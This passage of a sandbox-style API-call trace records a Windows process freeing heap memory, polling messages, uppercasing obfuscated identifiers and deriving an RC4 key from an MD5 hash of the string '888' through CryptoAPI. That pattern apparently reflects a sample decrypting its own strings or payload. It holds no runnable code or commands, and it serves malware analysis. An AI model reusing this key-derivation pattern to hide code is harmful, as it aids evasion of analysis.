lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0219.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.218] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0219.218] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0219.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0219.218] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.218] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0219.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0219.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.218] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.218] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.219] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.219] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0219.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0219.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0219.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0219.219] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0219.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.220] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.220] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.220] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.221] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.221] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.221] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.221] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.221] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.221] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.221] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.221] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.221] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.221] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.222] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.222] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.222] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.222] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.222] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.222] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.222] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.245] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.245] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.246] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.246] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0219.246] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0219.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0219.246] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0219.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0219.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0219.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.247] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0219.247] CryptHashData (hHash=0x9e2078, pbData=0x2a71db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0219.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.247] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.247] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0219.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaba40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0219.248] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.248] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.248] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.248] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.248] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.248] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0219.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fa0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0219.248] CryptDestroyHash (hHash=0x9e2078) returned 1 [0219.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38665d0 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0219.249] RtlAllocateHeap (HeapHandle=0x2af0000, 